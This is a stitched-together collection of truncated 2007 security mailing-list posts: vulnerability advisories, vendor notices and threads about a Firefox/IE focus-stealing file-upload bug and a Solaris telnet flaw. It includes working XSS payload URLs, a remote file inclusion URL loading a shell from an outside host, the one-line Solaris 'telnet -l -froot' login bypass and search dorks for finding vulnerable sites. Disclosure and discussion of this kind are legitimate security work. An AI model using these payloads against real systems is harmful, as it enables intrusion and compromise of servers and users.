At 21:54, Saturday 10 February 2007, Andrea Purificato - bunker wrote:
Version affected: qdig-1.2.9.3, qdig-devel-20060624
Bug fixed by 1.2.9.4 and devel-20070210
Thanks to haganafox for his work,
--
Andrea bunker Purificato
* phpPolls 1.0.3 (access to sensitive file)
* By : sn0oPy
* Risk : medium
* exploit :
Replace http://www.target.ma/phpPolls/index.php3
by
http://www.target.ma/phpPolls/phpPollAdmin.php3
* dork : inurl:phpPolls/
* contact : [EMAIL PROTECTED]
* Site :
On Sun, 11 Feb 2007, pdp (architect) wrote:
IE is vulnerable too, since I used to play around with this bug long
time ago.
Possibly MS00-093, but that's long fixed. But yes, MSIE variant is
possible, though more contrived.
/mz
try this
<input id=foo type=text/>
<script>
setInterval(function () {
    document.getElementById('foo').focus();
}, 1);
</script>
:) the address bar is disabled...
On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote:
phh :), I found something very interesting when testing your IE
example... every time
Multiple vulnerabilities in phpMyVisites
Application : phpMyVisites prior to 2.2 stable
Release Date : 11 February 2007
Author : Nicob nicob at nicob.net
Abstract :
==
Several vulnerabilities were identified in phpMyVisites. This software
is a free and powerful open source
here is an idea... we can combine both techniques into a single
attack... the hardest part of your hack is to force the user to type
:// plus several other / but if we steal the focus from the address
bar, unaware users will type something like this http://www.google.com
for example, which is
On Sun, 11 Feb 2007, pdp (architect) wrote:
here is an idea... we can combine both techniques into a single
attack... the hardest part of your hack is to force the user to type
:// plus several other /
Actually, MSIE doesn't require drive specification in the filename, and
will probably
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
php rrd browser (prb)
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in
php rrd browser 0.2.1
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
IP3 NetAccess leads to full system compromise
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
leads to full
This is not an SQL Injection. The script doesn't use any SQL database, please
tell me where the SQL request is =). However the install.php script can lead to
PHP code execution (works regardless of php.ini settings). Proof of concept:
#!/usr/bin/php
<?php
# This file requires the PhpSploit
Vendor: MediaWiki
Vulnerable: MediaWiki 1.9.1 and below
Bugtraq ID:
Secunia Advisory:
Release Date: 2007-01-29
Full Path Disclosure
This vulnerability affects all the default skins:
http://www.example.com/wiki/skins/Simple.deps.php
http://www.example.com/wiki/skins/MonoBook.deps.php
Well, :) I cannot see how you can force someone to type / at least
twice. Even if the targeted user writes a blog entry it is very
unlikely that he/she will use / . I guess this vector works well on
wikis and other systems that allow you to specify the text format
through meta-characters.
The
On Sun, 11 Feb 2007, Michal Zalewski wrote:
http://lcamtuf.coredump.cx/focusbug/index.html (FF)
http://lcamtuf.coredump.cx/focusbug/ieversion.html (MSIE)
Paul Szabo pointed out that this is related to exploits posted by Charles
McAuley and Bart van Arnhem in June 2006 (CVE-2006-2894). These
Thanks for the report, Michal.
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
BTW: Your last bug (popup blocker + XMLHttpRequest + srand() = oops) was
filed as bug 369390 https://bugzilla.mozilla.org/show_bug.cgi?id=369390
The factors of the bug are filed as separate
On Sun, 11 Feb 2007, Ben Bucksch wrote:
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
As per my later posts, this problem might be already in Bugzilla (a
variant of it was reported in mid-2006, and possibly independently as
early as in 2000).
BTW: Your last bug
Are file inclusion vulnerabilities equivalent to remote code
execution? Are servers (both Linux and Windows) now the lower hanging
fruit rather than desktop systems?
In the February edition of the Virus Bulletin magazine, we (Kfir
Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security)
I have contacted the developers 2 weeks ago, still no answer...
Vendor: DotClear
Vulnerable: DotClear 1.2.5 and below
Release Date: 2007-01-28
Full Path Disclosure
This vulnerability affects:
http://www.example.com/dotclear/themes/default/form.php
On Mon, Feb 12, 2007 at 12:00:30AM -0600, Gadi Evron wrote:
Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:
Tested around, and it does indeed work, on all solaris 10 (sparc x86).
Update from HD Moore:
but this bug isn't -froot, it's -fanythingbutroot
pdp (architect) wrote:
try this
<input id=foo type=text/>
<script>
setInterval(function () {
    document.getElementById('foo').focus();
}, 1);
</script>
:) the address bar is disabled...
Funny. Filed as bug 370094
https://bugzilla.mozilla.org/show_bug.cgi?id=370094
Ben Bucksch [EMAIL PROTECTED] wrote:
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
Please see also:
https://bugzilla.mozilla.org/show_bug.cgi?id=290478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2894
https://bugzilla.mozilla.org/show_bug.cgi?id=56236
After some research, I can offer this clarification:
1) The MSIE 7 attack vector I described is a distinctive, new
vulnerability that differs from the attack reported by Charles
McAuley and Bart van Arnhem. Attacks described by them were
fixed in MSIE7 (although MSIE6 is still
Site : Raditech.es
Product : Portal Search (May be others)
Portal Search is a product that can help to search in one or multiple Web
sites. http://www.raditech.es/esp/servicios/portal-search.shtml
This product can SEARCH and INDEX the contents of an entire web
site; additionally this product
===
Ubuntu Security Notice USN-417-3 February 09, 2007
postgresql-8.1 regression
===
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
This
Version : 1.0 Beta
Download : http://www.killervault.com
Files : guestbook.php
Error : function dologin() {
    global $mysql, $gbpass, $gburl;
    $time = time() + 86400*365;
    if($gbpass == $mysql['pass']) {
        setcookie('kvgbcookie', $mysql['pass'], $time, '/');
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Publisher Name: OpenPKG GmbH
Publisher Home: http://openpkg.com/
Advisory Id (public):OpenPKG-SA-2007.009
Advisory Type: OpenPKG Security
what's up Michal,
IE is vulnerable too, since I used to play around with this bug long
time ago. It is a variation of your exploit but the principles are the
same. I don't remember where I've read about it... hmm I guess
securityfocus.com... very nice demo.
On 2/11/07, Michal Zalewski [EMAIL
I have posted previously about a bug that seems to cause applications to
continue to run when a user logs off and when another users logs on,
he/she may be able to access the programs that continued to run after
the logoff, for example:
1. Log on as Administrator
2. Do some stuff
3. Log off,
funny, that bug seems to have been around for some time ^^
http://osvdb.org/displayvuln.php?osvdb_id=1007
--
best rgds, armin walland
focus market research
IT :: development, administration
http://www.focusmr.com
maculangasse 8
1220 wien
+43 (0)1-258 97 01 291
please try not to send me HTML
Folks,
During the last few years a couple of vulnerability advisories were
published about a number of blind attacks against TCP (.
These attacks required the attacker to guess or know the four-tuple
that identifies the TCP connection to be attacked.
Clearly, of the IP addresses and port
Virtual Calendar = (pwd.txt) Remote Password Disclosure Vulnerability
Script: Virtual Calendar
DorK: intitle:Virtual intitle:Calendar intitle:Demo
URL:
hey ..
Vulnerable : JBoss Portal
web : http://jboss.org
XSS :
1-
http://labs.example.org/portal/community?noproject=;scriptalert('BLacK_ZeRo')/script
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial
Solaris telnet 0-day.
telnet -l -froot [hostname]
hey guys .. check out this new xss i just found ;P
Vulnerable : communityserver Commercial edition
web : http://communityserver.org/
XSS :
http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3eo=Relevance
Discovered By BLacK ZeRo
[EMAIL
hey guys .. check out this new xss i just found ;P
Vulnerable : lighttpd
web : http://www.lighttpd.net
XSS :
http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
hey guys .. check out this new xss i just found ;P
Vulnerable : eWay
web : http://www.eway.no/eway
XSS :
http://127.0.0.1/path/default.aspx?pid=;scriptalert('bl4ck')/script
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
Someone found a crash bug in PHP 5.2.1.
Exploitable?
http://marc.theaimsgroup.com/?l=php-devm=117104930526516w=2
#[ Coded : H0tTurk-]
#[ Author: DrmaxVirus
#[ web app : Oreon1.2.3 Remote File Include ]
#[ My Site : WwW.H0tTurk.CoM ]
#[Referance:http://www.milw0rm.com/exploits/3150
#[ Thanx :
On Mon, 12 Feb 2007, Paul Szabo wrote:
https://bugzilla.mozilla.org/show_bug.cgi?id=304480
https://bugzilla.mozilla.org/show_bug.cgi?id=56236
https://bugzilla.mozilla.org/show_bug.cgi?id=258875
This probably explains why the core of the problem wasn't fixed for
Firefox: reports were
Version :
0.02 beta
Error :
require ($inews_path/inertia_sql_class.php);
Exploit :
http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/shell.txt
Eno7.Org - Crazy-King.ORg
Thanks : Apaci Erne Eno7 Tamturk UyussMan Ayyıldız Tim
On Mon, 12 Feb 2007, Claus Färber wrote:
A proper solution would be to keep a list of files explicitly selected
by the user and only allow uploads of files in this list. Then even if a
script can manipulate the field, the browser won't upload files that
have not been selected by
Dear List,
GE telnet -l -froot [hostname]
GE but this bug isn't -froot, it's -fanythingbutroot =P
Should we really consider this a BUG? With all due respect, this
reads, smells and probably tastes like a backdoor, an obvious one
granted, but still, to my belief this raises the question: are
On Sun, 11 Feb 2007, Michal Zalewski wrote:
This was tested with 2.0.0.1. Opera is most likely not vulnerable;
Microsoft Internet Explorer is not vulnerable as-is, but might be
vulnerable to a variant of the attack.
And indeed - here's a MSIE 7.0 demo:
Any word if Ipswitch released any fix for this? Is the latest version
vulnerable?
Title:Microsoft Visual C++ 8.0 standard library time functions
invalid assertion DoS (Problem 3000).
Product: Visual Studio 2005
Vendor: Microsoft
Vulnerability
class:Denial of Service
Remote: application dependent, remote vector is possible
CVE:
Michal Zalewski wrote:
This probably explains why the core of the problem wasn't fixed for
Firefox: reports were repeatedly reduced to an issue with hiding file
input fields by manipulating opacity or visibility (in my example, I
placed the box off-screen to the left, at negative absolute
There is an interesting logic flaw in Mozilla Firefox web browser.
The vulnerability allows the attacker to silently redirect focus of
selected key press events to an otherwise protected file upload form
field. This is possible because of how onKeyDown / onKeyPress events are
handled, allowing